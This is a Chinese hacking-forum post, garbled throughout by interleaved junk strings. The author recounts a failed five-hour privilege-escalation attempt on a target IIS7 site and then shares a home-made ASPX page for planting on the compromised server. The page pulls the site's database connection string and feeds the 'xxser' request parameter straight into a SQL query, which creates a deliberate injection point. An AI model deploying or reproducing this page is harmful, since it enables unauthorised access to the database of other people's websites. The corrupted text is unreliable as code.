昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
% L8 r+ V! l. K+ @3 z其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。; u0 m+ q: j( y: q9 E
代码量不多,自己写个拉倒了。烦死了。
" G. c5 I% {3 \3 I1 }8 `! E9 G) @! b4 U+ c+ e* m9 e) ^$ j) Y8 t
, A+ f' s! I1 n
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">; H4 y- d: |; s/ x9 [
<html xmlns="http://www.w3.org/1999/xhtml">
, E; a: j3 N7 J1 S+ i4 M2 D<head runat="server">
) W! U5 E" }2 @8 o <title>暗影aspx构造注射专用页面</title>
& @1 V+ q6 `2 e2 T</head>
4 J$ ~3 ^" {' J' s. {$ S$ P<body>, Y3 {! W( w" _" ^# \) X! h
<form id="form1" runat="server">$ g8 N- T9 r. T8 }) q
<div>
1 W5 n9 c: b1 [+ Z' W <script language="c#" runat="server">
* n) A, h) g! \8 A6 O * i, A, t$ u+ O7 u
void page_init(object sender, EventArgs e)6 n2 s2 M7 \8 P5 O1 i2 G [
{- g9 H5 I; `3 r" A% a
0 a& ^4 w2 ]# e# T$ C) H# n, {9 r System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
0 d" X! ]& E, H. u- U6 A2 _6 I. |# o, R
0 J* z6 }0 l5 b, ? conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
7 g7 a- A: d2 \& i; ^" @/ x conn.Open();
+ y# `6 l& Z8 z/ f- E: A% h5 J $ G, M3 b, C9 h$ h) a. y
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
, S# F9 G* R6 f! x3 \& L* T6 z 1 c7 @. _$ V4 h+ P
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);9 L2 B1 c5 o: x9 h" E
int x = command.ExecuteNonQuery();/ \8 u. x# u9 v; M% E- e$ \
Response.Write(i+"\n");
6 f f/ T p7 V' \( I* W, | Response.Write(x);3 D" V3 R; v+ L3 {: u5 h
conn.Close();0 E9 S) O6 g$ L/ T2 X' s+ v( ^
}
+ ?4 `4 ^5 `: {/ ~" |
* i6 Q& t6 J6 B+ R* K/ X </script>) m# w0 G( E% q" L
</div>
1 ^# f8 e* z' [5 S% _ </form>
! A, \6 |4 Z! D6 c( D+ [% v7 K</body>
. E R; ?- F5 {; U% R7 }+ f' ]</html>1 F2 e$ ~0 c) w
|